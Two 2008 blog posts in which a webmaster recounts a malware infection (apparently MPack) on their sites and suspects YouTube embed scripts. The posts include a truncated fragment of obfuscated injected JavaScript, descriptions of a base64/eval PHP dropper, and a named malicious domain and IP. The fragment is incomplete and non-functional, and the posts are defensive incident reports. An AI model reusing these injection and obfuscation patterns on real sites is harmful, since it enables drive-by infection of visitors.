2008
08.21

Malware everywhere

So, regarding my last post, perhaps I owe an apology to YouTube regarding malware distribution.  I have been chasing the problem for about a month now, and have finally narrowed it down to a virus known as “MPack” from Russia.  This is a really nasty one and appears to have several “ports of entry” into a web site.

 From what I can tell, the attacks came in through the following php that I innocently installed on my site (not this site), but have since removed:

  •  php Hamweather installation (nice app that gives weather in various locations).  Hacked through appending .include to the URL with a perl script reference on the end.  I notified them of the attack.  Hopefully they have corrected it by now.
  • php Mortgage calculator.  Supposed to give mortgage estimations at various rates.  Looks like it was malicious from the start (especially in some caching stuff with names like ‘smartie’).
  • WordPress blog – could be the ‘free’ template I downloaded.  Still not sure how they hacked this one.

What happened then, was that bad files got copied all over the site through the above-mentioned holes:

  • modsoap.php – This one periodically injected really evil Java Script into the <head> section of the index.php page.  The script looks like the following:   <script language=JavaScript>function dc(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(lots of numbers and more code here…);  Once executing, this script tries to download ActiveX controls and run .exes, exploiting IE weaknesses.  These guys did a good job of summarizing the details of the attack.
  • news.php – Looks like a bunch of random characters wrapped in a php base64_decode, unzip and eval calls.  I think it places modsoap.php elsewhere. 

Hopefully its gone now, but it will never be forgotten!

This is definitely a lesson learned in not trusting php script written by others even if they are reputable folks.

 midniteblogger.

2008
08.05

Publishing and managing web sites is always an interesting challenge and it helps to be able to generate extra income from them from programs like AdSense.  Recently, Google has allowed its publishers to monetize YouTube views/clicks by putting some script on their sites.

That is great, or so I thought, until the other morning I got a couple of emails from Google saying my site was distributing “malware.”  Quite a surprise to me since I strive to keep my sites as clean as possible.  Sure enough, upon going to the site, my anti-virus protector went crazy, complaining about JS/Psyme.J virus, Bugnraw!generic virus (Bugnraw!generic was detected in …\UIIL.EXE), and Hopee!generic virus.  It kept trying to download something from golnanosat.com/in (213.155.0.242) and wanting me to approve an exe to run that was signed by HiPoint Ltd, S.A.

What is going on here??  After a couple of days of digging, I believe the source was the YouTube video strip that I was embedding in my pages.  I took it off the page, and the virus warnings stopped.

It’s nearly impossible to get Google to take the “malware” warning off your site, but how ironic that it might be caused by a company that they own.  I hope they will at least take a look at this problem and determine if someone is hacking their YouTube publisher scripts.

Anyone else experiencing the same problem?

midniteblogger